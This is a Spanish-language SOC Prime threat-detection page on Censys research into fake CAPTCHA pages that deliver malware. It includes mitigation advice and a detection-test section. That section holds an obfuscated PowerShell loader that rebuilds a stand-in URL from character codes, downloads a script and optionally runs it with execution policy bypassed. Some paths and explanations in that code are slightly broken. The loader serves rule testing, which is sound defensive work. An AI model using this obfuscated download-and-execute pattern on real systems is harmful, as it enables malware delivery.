SOC Prime Bias: Medio

27 Ene 2026 17:11
newspaper icon Censys

Viviendo del Web: Cómo la Infraestructura de Confianza se Convirtió en una Interfaz de Distribución de Malware

Author Photo
Ruslan Mikhalov Jefe de Investigación de Amenazas en SOC Prime linkedin icon Seguir
Viviendo del Web: Cómo la Infraestructura de Confianza se Convirtió en una Interfaz de Distribución de Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumen

El informe examina un ecosistema a gran escala de “Captcha Falso” que arma interfaces de verificación web confiables para entregar cargas maliciosas. La similitud visual entre señuelos no es una señal confiable de atribución, porque el mismo patrón de interfaz puede estar encima de diferentes cadenas de ejecución—PowerShell, VBScript, instaladores MSI y entrega de notificaciones push controladas por el servidor. Usando hashing perceptual de alto volumen de capturas de pantalla, el análisis mapea cómo está organizado el ecosistema y enfatiza la separación entre la interfaz de usuario y el flujo de trabajo de la carga subyacente. Se aconseja a los defensores que vayan más allá de los indicadores cosméticos y prioricen la detección de la lógica de ejecución y la infraestructura.

Investigación

Censys identificó 9,494 activos de Captcha Falso y utilizó hashing perceptual para agruparlos por similitud visual, encontrando un clúster dominante similar a Cloudflare que representa alrededor del 70% de los sitios observados. Una revisión más profunda descubrió 32 variantes de carga distintas que abarcan scripts impulsados por portapapeles, instaladores basados en MSI, y entrega de estilo Matrix Push C2. El análisis de la infraestructura mostró grupos de servidores de respaldo separados apoyando cada técnica, con ejemplos citados incluyendo 95.164.53.115 y ghost.nestdns.com.

Mitigación

La detección no debe depender solo de las características visuales del señuelo o el comportamiento del portapapeles. En su lugar, monitoree permisos inusuales de notificación en el navegador, patrones de descarga y ejecución de PowerShell o VBScript, lanzamientos de MSI originados en URLs con temática de verificación, y tráfico de red asociado con puntos finales Matrix Push C2 conocidos. Bloquee o ponga en cuarentena páginas de verificación sospechosas y entrene a los usuarios para que otorguen permisos del navegador solo en sitios confiables y esperados.

Respuesta

Cuando se encuentra una página de Captcha Falso, alerte sobre subsiguientes ejecuciones de PowerShell, VBScript, o MSI así como eventos de suscripción de notificaciones. Correlacione la actividad del endpoint con indicadores de red tales como las IPs y dominios maliciosos referenciados. Aísle los sistemas afectados, capture la memoria volátil y realice un análisis forense de cualquier carga recuperada.

Flujo de Ataque

Todavía estamos actualizando esta parte. Inscríbete para ser notificado

Notificarme

Ejecución de Simulación

Prerrequisito: La Verificación de Telemetría y Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y el relato DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa de Ataque y Comandos:
    El atacante necesita obtener una carga maliciosa mientras oculta la URL de descarga. Construyen la URL en tiempo de ejecución usando códigos de caracteres, incrustan la cadena «enc» (visto comúnmente en cargas codificadas en Base64), y luego emplean Net.WebClient.DownloadFile para obtener el script. Esta técnica coincide con el enfoque de la regla en «ofuscación + Net.WebClient». Pasos:

    1. Genere la URL de descarga mediante reconstrucción de caracteres: 
      $url = ([char]65+[char]108+[char]105+[char]99+[char]101+[char]46+[char]99+[char]111+[char]109) + "/malware.ps1"
    2. Cree una variable de marcador de posición que contenga la cadena “enc” para satisfacer el segundo término de detección: 
      $encTag = "enc"
    3. Invoque la descarga: 
      $wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, "$env:TEMPpayload.ps1")
    4. Ejecute la carga descargada (opcional para la prueba): 
      powershell -ExecutionPolicy Bypass -File "$env:TEMPpayload.ps1"

    La presencia de Net.WebClient.DownloadFile, la palabra enc, y el uso de [char]::FromCharCode (usando la abreviatura [char]) asegura que la regla se active.

  • Script de Prueba de Regresión:

    # -------------------------------------------------
# Cargador Simulado de PowerShell – coincide con la regla Sigma
# -------------------------------------------------
# 1. Reconstruir URL de descarga usando códigos de caracteres
$url = ([char]104+[char]116+[char]116+[char]112+[char]115+[char]58+[char]47+[char]47+[char]109+[char]97+[char]108+[char]105+[char]99+[char]105+[char]111+[char]117+[char]115+[char]46+[char]99+[char]111+[char]109+[char]47+[char]112+[char]97+[char]121+[char]108+[char]111+[char]97+[char]100+[char]46+[char]112+[char]115+[char]49)
# Lo anterior deletrea: https://malicious.com/payload.ps1

# 2. Insertar el token "enc" para satisfacer la regla de detección
$encTag = "enc"

# 3. Realizar la descarga
$wc = New-Object System.Net.WebClient
$destination = "$env:TEMPpayload.ps1"
$wc.DownloadFile($url, $destination)

# 4. (Opcional) Ejecutar la carga
# powershell -ExecutionPolicy Bypass -File $destination

  • Comandos de Limpieza:

    # Eliminar la carga descargada
$payloadPath = "$env:TEMPpayload.ps1"
if (Test-Path $payloadPath) {
    Remove-Item -Force $payloadPath
}

# Eliminar el objeto de WebClient (recolección de basura manejada automáticamente)
Write-Host "Limpieza completa."

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis